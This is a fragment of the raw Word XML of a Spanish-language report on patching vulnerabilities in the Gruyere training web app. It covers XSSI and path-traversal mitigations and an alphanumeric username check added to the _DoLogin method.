      </w:r>
    </w:p>
    <w:p w14:paraId="3210823B" w14:textId="77777777" w:rsidR="00DB1A2F" w:rsidRPr="00810052" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E60F29E" w14:textId="77777777" w:rsidR="00DB1A2F" w:rsidRPr="00810052" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00810052">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  hash_to_verify = str(hash(cookie_scret + cookie + action_time))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2848616E" w14:textId="77777777" w:rsidR="00DB1A2F" w:rsidRPr="00810052" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00810052">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  return action_hash == hash_to_verify</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCE7E1E" w14:textId="77777777" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDBCB58" w14:textId="0F8FBA61" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00810052">
        <w:t>Con tal token, un a</w:t>
      </w:r>
      <w:r>
        <w:t>tacante también necesitaría adivinar el token para engañar con éxito a una víctima para que envíe una solicitud falsificada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135AFBBE" w14:textId="77777777" w:rsidR="00DB1A2F" w:rsidRPr="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E5CAAF1" w14:textId="6416B318" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55E18DDD" w14:textId="490C3193" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73D6A985" w14:textId="0D323A59" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AF51284" w14:textId="06D435E9" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1624EAF6" w14:textId="2156A581" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1417F9F1" w14:textId="76DC4F3D" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CD8DC4E" w14:textId="26889400" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60A27A9F" w14:textId="77777777" w:rsidR="00DB1A2F" w:rsidRPr="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E9D6201" w14:textId="77777777" w:rsidR="00DB1A2F" w:rsidRPr="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44CD4ACC" w14:textId="79497E05" w:rsidR="00D33545" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc127812516" w:history="1">
        <w:bookmarkStart w:id="76" w:name="_Toc128034184"/>
        <w:r w:rsidR="00D33545" w:rsidRPr="00610E00">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Inclusión de secuencias de comandos entre sitios (XSSI)</w:t>
        </w:r>
        <w:bookmarkEnd w:id="76"/>
      </w:hyperlink>
      <w:r w:rsidR="00607ECF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137470BE" w14:textId="7515E44A" w:rsidR="00607ECF" w:rsidRDefault="00607ECF" w:rsidP="00607ECF">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37E43227" w14:textId="77777777" w:rsidR="00607ECF" w:rsidRDefault="00607ECF" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>-Utilizar un token CSRF, para asegurarse de que los resultado JSON que contienen datos confidenciales solo se devuelven a sus propias páginas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4864DEEE" w14:textId="77777777" w:rsidR="00607ECF" w:rsidRDefault="00607ECF" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>-Las páginas de respuesta JSON sólo deben soportar peticiones POST, lo que evita que se cargue a través de una etiqueta script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C9255A" w14:textId="77777777" w:rsidR="00607ECF" w:rsidRDefault="00607ECF" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>-Asegurarse de que el script no es ejecutable (con sanitize). La forma estándar de hacerlo es añadirle algún prefijo no ejecutable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAAE62F" w14:textId="77777777" w:rsidR="00607ECF" w:rsidRDefault="00607ECF" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Un script que se ejecute en el mismo dominio puede leer el contenido de la respuesta y eliminar el prefijo, pero los scripts que se ejecuten en otros dominios no podrán hacerlo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E3DEB8" w14:textId="77777777" w:rsidR="00607ECF" w:rsidRPr="00607ECF" w:rsidRDefault="00607ECF" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="064ACF1A" w14:textId="77777777" w:rsidR="00607ECF" w:rsidRPr="00607ECF" w:rsidRDefault="00607ECF" w:rsidP="00607ECF">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12BB3BE5" w14:textId="36A7B9D9" w:rsidR="00D33545" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc127812517" w:history="1">
        <w:bookmarkStart w:id="77" w:name="_Toc128034185"/>
        <w:r w:rsidR="00D33545" w:rsidRPr="00610E00">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Path Transversal</w:t>
        </w:r>
        <w:bookmarkEnd w:id="77"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5B9193E5" w14:textId="7AE39EC4" w:rsidR="00607ECF" w:rsidRDefault="00607ECF" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C0C6E92" w14:textId="77777777" w:rsidR="00607ECF" w:rsidRDefault="00607ECF" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>No almacenar archivos confidenciales en el servidor web. Los únicos archivos que deben estar en la carpeta raíz del sitio son los que se necesitan para que funcione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FA9839" w14:textId="77777777" w:rsidR="00607ECF" w:rsidRDefault="00607ECF" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Asegúrate de estar utilizando las últimas versiones de tu servidor web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAEC3F5" w14:textId="77777777" w:rsidR="00607ECF" w:rsidRDefault="00607ECF" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Limpiar cualquier entrada del usuario. Eliminar todo excepto los datos conocidos y filtrar meta caracteres de la entrada del usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA07495" w14:textId="77777777" w:rsidR="00607ECF" w:rsidRDefault="00607ECF" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Eliminar “..” y “../” de cualquier entrada a la que se pude meter un archivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA5453C" w14:textId="03EFB2A7" w:rsidR="00607ECF" w:rsidRDefault="00607ECF" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Asegúrate de que el servidor web este configurado correctamente para permitir el acceso público solo a aquellos directorios que se necesitan para que el sitio funcione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA55E3A" w14:textId="6C1CA9B3" w:rsidR="00B109DB" w:rsidRDefault="00B109DB" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="094EB899" w14:textId="3375D9D2" w:rsidR="00607ECF" w:rsidRDefault="00450CAF" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora hablaremos de la vulnerabilidad de crear un usuario y que su nombre `pueda ser ‘..’, con lo cual su capeta pasa a ser la raíz, y por lo tanto puede subir ficheros y modificarlos, para corregirá esto modificaré el método _DoLogin de gruyere.py.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3B328A" w14:textId="7D0EB8C9" w:rsidR="00450CAF" w:rsidRDefault="00450CAF" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38D4035C" w14:textId="255D11FB" w:rsidR="00450CAF" w:rsidRDefault="00450CAF" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Lo que hare será añadir una lista de caracteres permitidos que será esta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDA87E6" w14:textId="730C7628" w:rsidR="00450CAF" w:rsidRPr="00BB7D5C" w:rsidRDefault="00450CAF" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB7D5C">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>allowed_chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401DD7A4" w14:textId="798B2F8F" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB7D5C">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>Además de mirar que no se pueda usar ..:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAC82F3" w14:textId="542883CF" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09781A42" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB7D5C">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">  def _DoLogin(self, cookie, specials, params):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9402DB" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DA05A57" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB7D5C">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    """Handles the /login url: validates the user and creates a cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3E8431" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BB6C69A" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB7D5C">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    Args:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15623694" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DEDB352" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB7D5C">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">      cookie: The cookie for this request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D47905" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23054588" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB7D5C">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">      specials: Other special values for this request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3933A9EE" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C4925E2" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB7D5C">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">      params: Cgi parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0AE5B5" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D3F20C6" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB7D5C">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531B06DA" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39D92552" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB7D5C">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    database = self._GetDatabase()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE2B894" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A798903" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB7D5C">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    message = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACFE85E" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="038A2A36" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB7D5C">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    allowed_chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'  # lista de caracteres permitidos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45125FD9" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6681FF3B" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB7D5C">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    if 'uid' in params and 'pw' in params:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF3F1DA" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24295B51" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB7D5C">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">        uid = self._GetParameter(params, 'uid')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65923938" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61A106F1" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB7D5C">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">        if all(char in allowed_chars for char in uid) and '..' not in uid:  # verifica si el nombre de usuario solo contiene caracteres permitidos y no contiene puntos suspensivos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AA1174" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7994478E" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB7D5C">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">            if uid in database:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586C6F7F" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="488A0407" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB7D5C">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">                if database[uid]['pw'] == self._GetParameter(params, 'pw'):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FE4B9A" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71C95AAE" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB7D5C">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">                    (cookie, new_cookie_text) = (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A74571" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
